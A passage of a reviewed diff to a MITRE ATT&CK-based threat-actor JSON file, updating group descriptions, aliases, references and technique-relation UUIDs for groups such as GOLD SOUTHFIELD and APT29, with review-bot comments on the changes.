- "type": "uses"
- },
- {
- "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70",
@@ -7014,13 +6953,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -7404,17 +7336,19 @@
"value": "Tonto Team - G0131"
},
{
- "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)",
+ "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)",
"meta": {
"external_id": "G0115",
"refs": [
"https://attack.mitre.org/groups/G0115",
+ "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
"https://www.secureworks.com/blog/revil-the-gandcrab-connection",
"https://www.secureworks.com/research/revil-sodinokibi-ransomware",
"https://www.secureworks.com/research/threat-profiles/gold-southfield"
],
"synonyms": [
- "GOLD SOUTHFIELD"
+ "GOLD SOUTHFIELD",
+ "Pinchy Spider"
]
},
"related": [
@@ -7482,14 +7416,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
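Review bot: as at @@ -5299, the `-`/`+` pair here is a removal of `b3d682b6-98f2-4fb0-aa3b-b4df007ca70a` and an insertion of `d511a6f6-4a33-41d5-bc95-c343875d1377`, not an edit. Across this patch `b3d682b6-...` is removed from five entries (here and at @@ -8764, @@ -11060, @@ -14109, @@ -14762) while `d511a6f6-...` is added to eleven, frequently in the same entry, which looks like an upstream technique split or re-scoping. One sentence in the PR description would let consumers diffing their correlations understand why a mapping moved rather than vanished.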
@@ -7801,6 +7735,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"tags": [
@@ -8344,6 +8285,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2d3f5b3c-54ca-4f4d-bb1f-849346d31230",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -8684,6 +8632,9 @@
"refs": [
"https://attack.mitre.org/groups/G0143",
"https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/"
+ ],
+ "synonyms": [
+ "Aquatic Panda"
]
},
"related": [
@@ -8764,13 +8715,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
@@ -8785,6 +8729,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -8832,6 +8783,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "084517bc-b8e7-5c86-a218-3f19e1379f3e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"tags": [
@@ -8964,13 +8922,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "084517bc-b8e7-5c86-a218-3f19e1379f3e",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "e44e0985-bc65-4a8f-b578-211c858128e3",
@@ -9114,6 +9065,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4",
"tags": [
@@ -9205,6 +9163,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925",
"tags": [
@@ -9518,13 +9483,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "93ae2edf-a598-4d2d-acd7-bcae0c021923",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
"tags": [
@@ -9567,13 +9525,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -10208,11 +10159,11 @@
"external_id": "G0001",
"refs": [
"http://blogs.cisco.com/security/talos/threat-spotlight-group-72",
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
- "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"https://attack.mitre.org/groups/G0001",
"https://securelist.com/games-are-over/70991/",
- "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "https://securelist.com/winnti-more-than-just-a-game/37029/",
+ "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
],
"synonyms": [
"Axiom",
@@ -10633,6 +10584,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
"tags": [
@@ -11060,13 +11018,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
"tags": [
@@ -11172,6 +11123,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -11316,6 +11274,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
"tags": [
@@ -11722,6 +11687,13 @@
],
"type": "similar"
},
+ {
+ "dest-uuid": "ad1a6df6-2251-5e47-a245-8693c1ace8fb",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
"tags": [
@@ -11799,13 +11771,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
"tags": [
@@ -11820,6 +11785,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -11932,13 +11904,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -11952,13 +11917,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "ad1a6df6-2251-5e47-a245-8693c1ace8fb",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "247cb30b-955f-42eb-97a5-a89fef69341e",
@@ -12263,6 +12221,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -12597,6 +12562,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3d9f700c-5eb5-5d36-a6e7-47b55f2844cd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b",
"tags": [
@@ -13191,13 +13163,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "3d9f700c-5eb5-5d36-a6e7-47b55f2844cd",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "bef4c620-0787-42a8-a96d-b7eb6e85917c",
@@ -13216,13 +13181,6 @@
]
},
"related": [
- {
- "dest-uuid": "10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
"tags": [
@@ -13962,6 +13920,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "231a81cd-4e24-590b-b084-1a4715b30d67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d",
"tags": [
@@ -13983,6 +13948,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2d3f5b3c-54ca-4f4d-bb1f-849346d31230",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -14109,13 +14081,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"tags": [
@@ -14158,6 +14123,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -14241,13 +14213,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "231a81cd-4e24-590b-b084-1a4715b30d67",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
@@ -14342,6 +14307,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a4aba29f-fb91-50d9-bdf9-2b184922a200",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
"tags": [
@@ -14369,13 +14341,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "a4aba29f-fb91-50d9-bdf9-2b184922a200",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "55033a4d-3ffe-46b2-99b4-2c1541e9ce1c",
@@ -14762,13 +14727,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47",
"tags": [
@@ -14804,6 +14762,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -15215,7 +15180,7 @@
"value": "APT18 - G0026"
},
{
- "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)",
+ "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)",
"meta": {
"external_id": "G0016",
"refs": [
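Review bot: the description still reads "is threat group that has been attributed", missing the article "a", in both the old and the new line; if this field is copied verbatim from the MITRE CTI source the fix belongs upstream, otherwise patch it here while the line is being touched. Note also that the new line drops the sentence listing the SolarWinds victim sectors and regions in favour of the campaign link, so that context now lives only under C0024; that is fine if intentional, but the commit message should say the text was re-synced rather than hand-edited.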
@@ -15224,6 +15189,7 @@
"https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/",
"https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF",
"https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/",
"https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
@@ -15239,6 +15205,8 @@
"https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf",
"https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf",
"https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
"https://www.secureworks.com/research/threat-profiles/iron-ritual",
"https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf",
"https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
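Review bot: the two PwC WellMess refs added here have no matching (Citation: ...) entry in the description hunk above, unlike the Unit 42 SolarStorm ref, which pairs with the new "Unit 42 SolarStorm December 2020" citation. If the refs array is meant to aggregate sources from related software and technique entries rather than mirror the description, that is fine, but please confirm so the refs list does not silently drift from the text it supports.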
@@ -15257,7 +15225,9 @@
"YTTRIUM",
"The Dukes",
"Cozy Bear",
- "CozyDuke"
+ "CozyDuke",
+ "SolarStorm",
+ "Blue Kitsune"
]
},
"related": [
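Review bot: "SolarStorm" is backed by the new Unit 42 citation and ref, but "Blue Kitsune" appears nowhere in this entry's description or refs; an alias with no traceable source is hard to validate or retire later, so add the reference it comes from or point to the upstream CTI change that introduced it.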
@@ -15275,13 +15245,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
"tags": [
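Review bot: this is the first of a long run of hunks that drop `uses` relations from G0016 (00f90846, 045d0922, 132d5b37, 15dbf668 and onward through fdc47f44) without adding anything in their place. Presumably these techniques now hang off the SolarWinds Compromise campaign C0024 that the description starts linking to, but the commit should state that explicitly, because on its own this reads as attribution data being lost. The JSON itself stays well-formed: each removed object is deleted whole and the surrounding commas remain consistent.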
@@ -15296,13 +15259,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "066b057c-944e-4cfc-b654-e3dfba04b926",
"tags": [
@@ -15311,14 +15267,14 @@
"type": "uses"
},
{
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff",
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
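Review bot: read these two -/+ pairs as one insertion and one removal in a dest-uuid-sorted array, not as two edits: 09c4c11e is new, 10ffac09 is gone, and 10d51417 is unchanged, it merely shifts one slot. The same presentation recurs in later hunks (3c4a2599 and 3ccef7ae out, 3d52e51e in; 58a3e6aa out, 55bb4471 in; 861b8fd2 out, 8861073d in), so anyone reviewing should compare the before/after sets of UUIDs rather than the paired lines.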
@@ -15338,20 +15294,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "199463de-d9be-46d6-bb41-07234c1dd5a6",
"tags": [
@@ -15373,13 +15315,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
"tags": [
@@ -15387,13 +15322,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -15401,13 +15329,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "24769ab5-14bd-4f4e-a752-cfb185da53ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11",
"tags": [
@@ -15415,13 +15336,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
"tags": [
@@ -15443,13 +15357,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -15478,13 +15385,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "32f49626-87f4-4d6c-8f59-a0dca953fe26",
"tags": [
@@ -15492,20 +15392,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "359b00ad-9425-420b-bba5-6de8d600cbc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "3a4197ae-ec63-4162-907b-9a073d1157e4",
"tags": [
@@ -15514,14 +15400,7 @@
"type": "uses"
},
{
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "dest-uuid": "3d52e51e-f6db-4719-813c-48002a99f43a",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15548,34 +15427,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "438c967d-3996-4870-bfc2-3954752a1927",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "47124daf-44be-4530-9c63-038bc64318dd",
"tags": [
@@ -15583,20 +15434,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "4efc3e00-72f2-466a-ab7c-8a7dc6603b19",
"tags": [
@@ -15604,27 +15441,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "54a01db0-9fab-4d5f-8209-53cef8425f4a",
"tags": [
@@ -15647,7 +15463,7 @@
"type": "uses"
},
{
- "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15688,20 +15504,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "65370d0b-3bd4-4653-8cf9-daf56f6be830",
"tags": [
@@ -15744,27 +15546,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
